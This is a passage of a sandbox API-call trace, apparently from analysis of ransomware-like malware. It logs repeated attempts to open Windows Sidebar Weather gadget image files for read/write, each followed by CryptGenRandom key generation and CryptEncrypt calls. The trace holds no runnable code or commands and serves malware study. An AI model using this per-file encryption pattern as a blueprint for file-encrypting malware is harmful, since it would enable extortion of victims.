returned 1 [0160.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_hail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.667] GetProcessHeap () returned 0x2c0000 [0160.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.667] GetProcessHeap () returned 0x2c0000 [0160.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f422d0 | out: hHeap=0x2c0000) returned 1 [0160.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce990 | out: pbBuffer=0x25ce990) returned 1 [0160.667] GetProcessHeap () returned 0x2c0000 [0160.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce988*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce988*=0x30) returned 1 [0160.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_few-showers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.674] GetProcessHeap () returned 0x2c0000 [0160.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.674] GetProcessHeap () returned 0x2c0000 [0160.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ef10 | out: hHeap=0x2c0000) returned 1 [0160.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce988 | out: pbBuffer=0x25ce988) returned 1 [0160.675] GetProcessHeap () returned 0x2c0000 [0160.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce980*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce980*=0x30) returned 1 [0160.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.676] GetProcessHeap () returned 0x2c0000 [0160.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.676] GetProcessHeap () returned 0x2c0000 [0160.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41da8 | out: hHeap=0x2c0000) returned 1 [0160.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce988 | out: pbBuffer=0x25ce988) returned 1 [0160.676] GetProcessHeap () returned 0x2c0000 [0160.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce980*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce980*=0x30) returned 1 [0160.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.678] GetProcessHeap () returned 0x2c0000 [0160.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.678] GetProcessHeap () returned 0x2c0000 [0160.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41ca0 | out: hHeap=0x2c0000) returned 1 [0160.678] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce980 | out: pbBuffer=0x25ce980) returned 1 [0160.678] GetProcessHeap () returned 0x2c0000 [0160.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce978*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce978*=0x30) returned 1 [0160.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.680] GetProcessHeap () returned 0x2c0000 [0160.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.680] GetProcessHeap () returned 0x2c0000 [0160.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41b98 | out: hHeap=0x2c0000) returned 1 [0160.680] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce980 | out: pbBuffer=0x25ce980) returned 1 [0160.680] GetProcessHeap () returned 0x2c0000 [0160.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.680] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce978*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce978*=0x30) returned 1 [0160.681] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.682] GetProcessHeap () returned 0x2c0000 [0160.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.682] GetProcessHeap () returned 0x2c0000 [0160.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b960 | out: hHeap=0x2c0000) returned 1 [0160.683] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce978 | out: pbBuffer=0x25ce978) returned 1 [0160.683] GetProcessHeap () returned 0x2c0000 [0160.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce970*=0x30) returned 1 [0160.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.684] GetProcessHeap () returned 0x2c0000 [0160.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.684] GetProcessHeap () returned 0x2c0000 [0160.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7848 | out: hHeap=0x2c0000) returned 1 [0160.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce978 | out: pbBuffer=0x25ce978) returned 1 [0160.684] GetProcessHeap () returned 0x2c0000 [0160.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce970*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce970*=0x30) returned 1 [0160.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.697] GetProcessHeap () returned 0x2c0000 [0160.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.697] GetProcessHeap () returned 0x2c0000 [0160.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b818 | out: hHeap=0x2c0000) returned 1 [0160.697] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce970 | out: pbBuffer=0x25ce970) returned 1 [0160.697] GetProcessHeap () returned 0x2c0000 [0160.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce968*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce968*=0x30) returned 1 [0160.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.699] GetProcessHeap () returned 0x2c0000 [0160.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.699] GetProcessHeap () returned 0x2c0000 [0160.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46e60 | out: hHeap=0x2c0000) returned 1 [0160.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce970 | out: pbBuffer=0x25ce970) returned 1 [0160.699] GetProcessHeap () returned 0x2c0000 [0160.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.699] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce968*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce968*=0x30) returned 1 [0160.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.701] GetProcessHeap () returned 0x2c0000 [0160.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.701] GetProcessHeap () returned 0x2c0000 [0160.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b6d0 | out: hHeap=0x2c0000) returned 1 [0160.701] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce968 | out: pbBuffer=0x25ce968) returned 1 [0160.701] GetProcessHeap () returned 0x2c0000 [0160.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.701] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce960*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce960*=0x30) returned 1 [0160.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.710] GetProcessHeap () returned 0x2c0000 [0160.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.710] GetProcessHeap () returned 0x2c0000 [0160.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46d28 | out: hHeap=0x2c0000) returned 1 [0160.710] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce968 | out: pbBuffer=0x25ce968) returned 1 [0160.710] GetProcessHeap () returned 0x2c0000 [0160.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.710] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce960*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce960*=0x30) returned 1 [0160.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.717] GetProcessHeap () returned 0x2c0000 [0160.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.717] GetProcessHeap () returned 0x2c0000 [0160.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41988 | out: hHeap=0x2c0000) returned 1 [0160.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce960 | out: pbBuffer=0x25ce960) returned 1 [0160.717] GetProcessHeap () returned 0x2c0000 [0160.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce958*=0x30) returned 1 [0160.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.719] GetProcessHeap () returned 0x2c0000 [0160.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.719] GetProcessHeap () returned 0x2c0000 [0160.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44128 | out: hHeap=0x2c0000) returned 1 [0160.719] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce960 | out: pbBuffer=0x25ce960) returned 1 [0160.719] GetProcessHeap () returned 0x2c0000 [0160.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.719] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce958*=0x30) returned 1 [0160.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.728] GetProcessHeap () returned 0x2c0000 [0160.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.728] GetProcessHeap () returned 0x2c0000 [0160.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41670 | out: hHeap=0x2c0000) returned 1 [0160.728] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce958 | out: pbBuffer=0x25ce958) returned 1 [0160.728] GetProcessHeap () returned 0x2c0000 [0160.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.728] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce950*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce950*=0x30) returned 1 [0160.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.739] GetProcessHeap () returned 0x2c0000 [0160.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.739] GetProcessHeap () returned 0x2c0000 [0160.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e538 | out: hHeap=0x2c0000) returned 1 [0160.739] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce958 | out: pbBuffer=0x25ce958) returned 1 [0160.740] GetProcessHeap () returned 0x2c0000 [0160.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce950*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce950*=0x30) returned 1 [0160.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.741] GetProcessHeap () returned 0x2c0000 [0160.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.741] GetProcessHeap () returned 0x2c0000 [0160.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef260 | out: hHeap=0x2c0000) returned 1 [0160.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce950 | out: pbBuffer=0x25ce950) returned 1 [0160.741] GetProcessHeap () returned 0x2c0000 [0160.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce948*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce948*=0x30) returned 1 [0160.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.761] GetProcessHeap () returned 0x2c0000 [0160.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.761] GetProcessHeap () returned 0x2c0000 [0160.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef090 | out: hHeap=0x2c0000) returned 1 [0160.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce950 | out: pbBuffer=0x25ce950) returned 1 [0160.761] GetProcessHeap () returned 0x2c0000 [0160.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce948*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce948*=0x30) returned 1 [0160.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.777] GetProcessHeap () returned 0x2c0000 [0160.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.777] GetProcessHeap () returned 0x2c0000 [0160.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeea38 | out: hHeap=0x2c0000) returned 1 [0160.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce948 | out: pbBuffer=0x25ce948) returned 1 [0160.778] GetProcessHeap () returned 0x2c0000 [0160.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce940*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce940*=0x30) returned 1 [0160.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.778] GetProcessHeap () returned 0x2c0000 [0160.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.778] GetProcessHeap () returned 0x2c0000 [0160.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee698 | out: hHeap=0x2c0000) returned 1 [0160.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce948 | out: pbBuffer=0x25ce948) returned 1 [0160.778] GetProcessHeap () returned 0x2c0000 [0160.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce940*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce940*=0x30) returned 1 [0160.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.778] GetProcessHeap () returned 0x2c0000 [0160.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.778] GetProcessHeap () returned 0x2c0000 [0160.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee5b0 | out: hHeap=0x2c0000) returned 1 [0160.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce940 | out: pbBuffer=0x25ce940) returned 1 [0160.779] GetProcessHeap () returned 0x2c0000 [0160.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce938*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce938*=0x30) returned 1 [0160.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.779] GetProcessHeap () returned 0x2c0000 [0160.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.779] GetProcessHeap () returned 0x2c0000 [0160.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee4c8 | out: hHeap=0x2c0000) returned 1 [0160.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce940 | out: pbBuffer=0x25ce940) returned 1 [0160.779] GetProcessHeap () returned 0x2c0000 [0160.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce938*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce938*=0x30) returned 1 [0160.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png"), dwDesiredAccess=0xc0000000, 